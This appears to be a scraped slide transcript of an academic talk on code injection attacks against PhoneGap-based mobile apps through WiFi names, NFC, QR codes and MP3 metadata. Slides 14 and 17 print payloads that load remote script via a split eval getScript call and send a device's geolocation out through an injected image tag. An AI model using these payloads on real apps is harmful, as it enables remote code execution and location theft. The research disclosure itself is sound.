Presentation is loading. Please wait.

Presentation is loading. Please wait.

Code Injection Attacks on HTML5-based Mobile Apps

Published byEsther Wragge Modified over 10 years ago

Similar presentations

Presentation on theme: "Code Injection Attacks on HTML5-based Mobile Apps"— Presentation transcript:

1 Code Injection Attacks on HTML5-based Mobile Apps
Xing Jin, Tongbo Luo, Derek G. Tsui, Wenliang Du Department of Electrical Engineering & Computer Science Syracuse University

2 (a) (b) (c) (d) (e) (f) (g) (h)

3 Outline BackGround Code Injection Attacks on HTML5-based mobile apps
Overview of HTML5-based Mobile App Overview of PhoneGap Architecture Risks in JavaScript Code Injection Attacks on HTML5-based mobile apps Overview of the Attack Channels of the Attack Examples (WIFI, NFC, MP3) Length limitation Real Vulnerable Cases Future Work

4 Overview of HTML5-based Mobile App
PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() Device Accelerometer Camera Compass Contacts File Geolocation Notification Advantage: Can be easily ported between different platforms X X

5 Overview of PhoneGap Architecture

6 Risks in JavaScript Data and code can be mixed together.
var text="Hello!<script>alert('hello')</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.

7 Overview of the Attack

8 Overview of the Attack 2 3 1

9 Channels of XDS Attack ID Channels (WiFi, Bluetooth)
Data Channels Unique to Mobile Devices (NFC, Barcode, SMS) Metadata Channels (MP3, MP4, Image) For the channels we have identified in this paper, we categorized them into three categories. The first one is the ID channels, we can embed code into some identities, e.g., the WiFi SSID, Bluetooth name. The second one is data channels unique to mobile devices, including NFC, Barcode and SMS. The third one is the metadata channels. Media data, e.g., MP3, MP4, Image, they use metadata to describe the detail information of the files, including artist, album, model. We can also successfully inject code into these metadata Fields. Next I will pick one example in each category to show how the attack works.

10 Example 1(WiFi) Non PhoneGap WiFi-Finder PhoneGap WiFi-Finder

11 Example 2(NFC) Non PhoneGap NFC App PhoneGap NFC App

12 Example 3(mp3) Non PhoneGap Mp3 App PhoneGap Mp3 App
Non PhoneGap Mp3 App PhoneGap Mp3 App

13 Length Limitation of Channels

14 Overcome the limitation
Use External JS files: <script src=//mu.gl></script> ( will be filter out by innerHTML) Split JS code into pieces: <img src onerror=$.getScript(' (need to use jQuery) 1 <img src onerror=a="$.getScr"> 2 <img src onerror=b="ipt('ht"> 3 <img src onerror=c="tp://mu."> 4 <img src onerror=d="gl')"> 5 <img src onerror=eval(a+b+c+d)>

15 Real vulnerable cases Downloaded 764 PhoneGap apps from Google Play
Find several vulnerable apps satisfy two attack conditions: read external data from the channels that we have identified use vulnerable APIs or attributes to display information from the channels

16 Real Vulnerable Cases Information sent to Sever Non PhoneGap App

17 Real vulnerable Cases The code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m='Latitude:'+loc.coords.latitude+ '\n'+'Longitude:'+loc.coords.longitude; alert(m); b=document.createElement('img'); b.src=' })>

18 Future Work Large Scale analysis of HTML5-based mobile apps
Solution to address the attack

19 Thanks! Q & A

Download ppt "Code Injection Attacks on HTML5-based Mobile Apps"

Similar presentations

Google Android Introduction to Mobile Computing. Android is part of the build a better phone process Open Handset Alliance produces Android Comprises.

Google Android Introduction to Mobile Computing. Android is part of the build a better phone process Open Handset Alliance produces Android Comprises.
The Ludei platform Iker Jamardo HTML5 LA 2013/06/10.

The Ludei platform Iker Jamardo HTML5 LA 2013/06/10.
TouchDevelop Create apps ON your phone! Peli de Halleux (Senior Software Developer) Microsoft Research.

TouchDevelop Create apps ON your phone! Peli de Halleux (Senior Software Developer) Microsoft Research.
Samsung Smart TV is a web-based application running on an application engine installed on digital TVs connected to the Internet.

Samsung Smart TV is a web-based application running on an application engine installed on digital TVs connected to the Internet.
Developing downloadable mobile apps using HTML5 and PhoneGap Apache Callback Ron Perry, CTO, Worklight Inc.

Developing downloadable mobile apps using HTML5 and PhoneGap Apache Callback Ron Perry, CTO, Worklight Inc.
GovCamp QLD 2012 Different approaches to mobile app development.

GovCamp QLD 2012 Different approaches to mobile app development.
Developing Mobile Apps for Drupal Sites Manil Maskey Information Technology & Systems Center University of Alabama in Huntsville ESIP.

Developing Mobile Apps for Drupal Sites Manil Maskey Information Technology & Systems Center University of Alabama in Huntsville ESIP.
Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.

Xiao Zhang and Wenliang Du Dept. of Electrical Engineering & Computer Science Syracuse University.
Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,

Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,
D4.3 Additional Applications iPad Application – Facebook Integration George Chrysochoidis i-sieve technologies ltd. PATHS Project Review, 12th March 2014,

D4.3 Additional Applications iPad Application – Facebook Integration George Chrysochoidis i-sieve technologies ltd. PATHS Project Review, 12th March 2014,
Javascript Introduction Norman White Material is from w3schools.com Go there to run examples interactively.

Javascript Introduction Norman White Material is from w3schools.com Go there to run examples interactively.
Authoring Languages and Web Authoring Software 4.01 Examine web page development and design.

Authoring Languages and Web Authoring Software 4.01 Examine web page development and design.
Mobile App Development Using: Presented by Tyler Richey Images from

Mobile App Development Using: Presented by Tyler Richey Images from
Richard Yu.  Present view of the world that is: Enhanced by computers Mix real and virtual sensory input  Most common AR is visual Mixed reality virtual.

Richard Yu.  Present view of the world that is: Enhanced by computers Mix real and virtual sensory input  Most common AR is visual Mixed reality virtual.
Cross Platform Mobile application development HTML5 and JavaScript Chris Connor.

Cross Platform Mobile application development HTML5 and JavaScript Chris Connor.
1 Mobile Computing Mobile First (formerly Worklight) Copyright 2015 by Janson Industries.

1 Mobile Computing Mobile First (formerly Worklight) Copyright 2015 by Janson Industries.
Mobile Application Development

Mobile Application Development
Today Microformats and a sprinkling of RDF Everyone good with SVN? Everyone checked something in? No? Try now. Mobile – Functionality – UX If you get too.

Today Microformats and a sprinkling of RDF Everyone good with SVN? Everyone checked something in? No? Try now. Mobile – Functionality – UX If you get too.
Phonegap Deployment CIS 136 Building Mobile Apps 1.

Phonegap Deployment CIS 136 Building Mobile Apps 1.
Anatomy of an App HTML, CSS, jQuery, jQuery Mobile CIS 136 Building Mobile Apps 1.

Anatomy of an App HTML, CSS, jQuery, jQuery Mobile CIS 136 Building Mobile Apps 1.

Similar presentations

Ads by Google